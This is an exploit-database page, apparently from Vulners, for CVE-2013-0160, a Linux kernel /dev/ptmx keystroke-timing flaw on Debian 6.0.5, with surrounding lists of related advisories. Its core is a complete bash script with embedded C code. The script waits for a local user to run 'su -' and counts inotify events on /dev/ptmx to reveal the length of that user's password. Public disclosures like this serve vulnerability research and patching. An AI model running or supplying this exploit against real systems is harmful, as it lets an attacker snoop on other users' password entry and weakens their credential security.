Lucene search
K

Linux Kernel 2.6.32-5 (Debian 6.0.5) - '/dev/ptmx' Key Stroke Timing Local Disclosure

🗓️ 05 Feb 2013 00:00:00Reported by vladzType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 64 Views

Determining password length of local user using keystroke timing attack on Debian 6.0.

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Linux Kernel /dev/ptmx Key Stroke Timing Local Disclosure
5 Feb 201300:00
zdt
ATTACKERKB
CVE-2013-0160
18 Feb 201304:41
attackerkb
BDU FSTEC
Vulnerabilities in the Debian GNU/Linux operating system that allow a local malicious individual to compromise the confidentiality, integrity, and accessibility of protected information
28 Apr 201500:00
bdu_fstec
BDU FSTEC
Vulnerabilities in the operating system openSUSE, which allow a malicious individual to compromise the accessibility of protected information
28 Apr 201500:00
bdu_fstec
BDU FSTEC
Vulnerabilities in the operating system openSUSE, which allow a malicious individual to compromise the accessibility of protected information
28 Apr 201500:00
bdu_fstec
BDU FSTEC
Vulnerabilities in the operating system openSUSE, which allow a malicious individual to compromise the accessibility of protected information
28 Apr 201500:00
bdu_fstec
BDU FSTEC
Vulnerabilities in the operating system openSUSE, which allow a malicious individual to compromise the accessibility of protected information
28 Apr 201500:00
bdu_fstec
BDU FSTEC
Vulnerabilities in the operating system openSUSE, which allow a malicious individual to compromise the accessibility of protected information
28 Apr 201500:00
bdu_fstec
BDU FSTEC
Vulnerabilities in the operating system openSUSE, which allow a malicious individual to compromise the accessibility of protected information
28 Apr 201500:00
bdu_fstec
BDU FSTEC
Vulnerabilities in the operating system openSUSE, which allow a malicious individual to compromise the accessibility of protected information
28 Apr 201500:00
bdu_fstec
Rows per page
#!/bin/bash
# ptmx-su-pwdlen.sh -- This PoC determine the password length of a local
# user who runs "su -".  Done thanks to the ptmx keystroke timing attack
# (CVE-2013-0160). See http://vladz.devzero.fr/013_ptmx-timing.php for
# more information.  
#
# Tested on Debian 6.0.5 (kernel 2.6.32-5-amd64).
#
# "THE BEER-WARE LICENSE" (Revision 42):
# <[email protected]> wrote this file. As long as you retain this notice
# you can do whatever you want with this stuff. If we meet some day, and
# you think this stuff is worth it, you can buy me a beer in return. -V.

if ps -e -o cmd= | egrep -q "^(-|^)su"; then
  echo "[-] Kill/close all running \"su\" session before using this PoC"
  exit 1
fi

exe=$(mktemp) || exit 1
tmp=$(mktemp) || exit 1

cat > ${exe}.c << _EOF_
#include <stdio.h>
#include <signal.h>
#include <unistd.h>
#include <sys/inotify.h>

static int count = 0;

void display_result() {

  printf("[+] password len is %d\n", count-1);
  _exit(0);
}

int main() {

  int fd;
  char buf[1024];

  signal(SIGINT, display_result);

  fd = inotify_init();
  inotify_add_watch(fd, "/dev/ptmx", IN_MODIFY);

  while(read(fd, buf, 1024)) count++; 

  return 0;
}
_EOF_

cc -o ${exe}{,.c}

echo "[*] Wait for someone to run \"su -\""

while true; do 

  ps -e -o cmd= | egrep "^(-|^)su" >${tmp}
  x=$(wc -l ${tmp})

  case ${x% *} in

    1) (( run )) && continue;
       echo -n "[+] su detected, full command: "
       cat ${tmp}; ${exe} & 
       (( run = 1 ))  ;;

    2) [ ! -z "$!" ] && kill -2 $!; break ;;

  esac

done

rm -f ${exe}{,.c} ${tmp}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

05 Feb 2013 00:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 22.1
EPSS0.00732
64